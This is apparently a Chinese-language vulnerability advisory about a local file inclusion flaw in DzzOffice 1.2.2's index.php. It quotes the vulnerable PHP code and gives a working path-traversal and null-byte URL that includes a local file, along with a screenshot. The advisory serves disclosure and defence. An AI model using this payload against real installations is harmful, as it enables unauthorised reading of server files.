DzzOffice 1.2.2 /index.php 本地文件包含漏洞

<ul><li>Index.php</li></ul><pre class="">$dzz = C::app(); $mod = getgpc('mod'); $mod = !empty($mod) ? $mod : ''; $op = !empty($_GET['op']) ? $_GET['op'] : 'index'; $cachelist = array(); $dzz-&gt;cachelist = $cachelist; $dzz-&gt;init(); //调用各自的模块 if(empty($mod)){ if($_G['uid']&lt;1 &amp;&amp; $_G['setting']['loginset']['available']){ @header("Location: user.php?mod=logging"); exit(); } define('CURMODULE', 'dzzindex'); require DZZ_ROOT.'./dzz/index.php'; }else{ define('CURMODULE', str_replace(':','/',$mod)); if(strpos(strtolower($mod),':')!==false){ $modfile='./dzz/'.str_replace(':','/',$mod).'/'.($op?$op:'index').'.php'; //exit(DZZ_ROOT.$modfile); if(@!file_exists(DZZ_ROOT.$modfile)){ showmessage($modfile.lang('message','file_nonexistence',array('modfile'=&gt;$modfile))); } }else{ if(@!file_exists(DZZ_ROOT.($modfile = './dzz/'.$mod.'/'.$op.'.php'))) { showmessage('undefined_action', '', array('mod' =&gt; $mod)); } } include DZZ_ROOT.$modfile; } </pre><p>程序将用户输入的字符经过拼接后直接带入include导致文件包含漏洞。</p><p>当访问：</p><pre class="">http://10.211.55.4/dzzoffice/index.php?mod=admin:..:..&amp;op=license.txt%00</pre><p>发现包含了目录下的license.txt&nbsp;</p><p><img alt="D3C93EA5-BBDE-4727-8D67-2688CA79D089.png" src="https://images.seebug.org/@/uploads/1434694369180-D3C93EA5-BBDE-4727-8D67-2688CA79D089.png" data-image-size="988,267"><br></p>